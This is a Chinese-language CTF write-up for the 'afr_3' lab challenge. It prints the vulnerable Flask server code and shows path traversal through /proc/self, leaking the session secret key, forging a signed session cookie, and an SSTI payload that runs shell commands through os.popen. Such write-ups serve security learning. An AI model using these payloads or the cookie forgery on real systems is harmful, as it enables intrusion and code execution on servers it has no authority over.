[Python知识库]《从0到1：CTFer成长之路》afr_3

靶场：afr_3

知识点

• /proc目录
• flask之ssti模板注入
• flask-session-cookie-manager
• burpsuite抓包

解题过程

1. 检查首页，在输入框随便输入，并根据引导进入下一个页面
   
   
   

2. 查看URL:
   http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article
   通过?name=article可以考虑目录穿越
   http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=../../../../../proc/self/cmdline
   

3. 由于不知道具体路径，查看server.py
   http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=../../../../../proc/self/cwd/server.py
   是一段python代码

   #!/usr/bin/python 
   import os from flask 
   import ( Flask, render_template, request, url_for, redirect, session, render_template_string ) from flask_session 
   import Session 
   app = Flask(__name__) 
   execfile('flag.py') 
   execfile('key.py') 
   FLAG = flag 
   app.secret_key = key 
   
   @app.route("/n1page", methods=["GET", "POST"]) 
   def n1page(): 
   	if request.method != "POST": 
   		return redirect(url_for("index")) 
   	n1code = request.form.get("n1code") or None 
   	if n1code is not None: n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","") 
   if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code template = None 
   if session['n1code'] is not None: template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code'] session['n1code'] = None 
   return render_template_string(template) @app.route("/", methods=["GET"])
    
    
   def index(): 
   	return render_template("main.html") @app.route('/article', methods=['GET']) 
   	
   	
   def article(): error = 0 
   
   
   if 'name' in request.args: 
   	page = request.args.get('name') 
   else: 
   	page = 'article' 
   if page.find('flag')>=0: page = 'notallowed.txt' 
   try: 
   	template = open('/home/nu11111111l/articles/{}'.format(page)).read() 
   except Exception as e: 
   	template = e 
   return render_template('article.html', template=template) 
   if __name__ == "__main__": app.run(host='0.0.0.0', debug=False) 
   

   包含两个文件：
   

4. 查看两个文件
   flag.py
   
   key.py
   得到key：'Drmhze6EPcv0fN_81Bj-nA’

5. 伪造session
   密钥：Drmhze6EPcv0fN_81Bj-nA
   构造ssti模板注入：{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}

   ┌──(root💀kali)-[/tools/flask-session-cookie-manager]
   └─# python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
   
   
   .eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YeQW8g.wLvMGqu7CxX5T08df5bzcUd3nw8
   

   得到cookie：.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YeQW8g.wLvMGqu7CxX5T08df5bzcUd3nw8

6. 通过burpsuite抓包上传cookie得到flag
   

flag：n1book{afr_3_solved}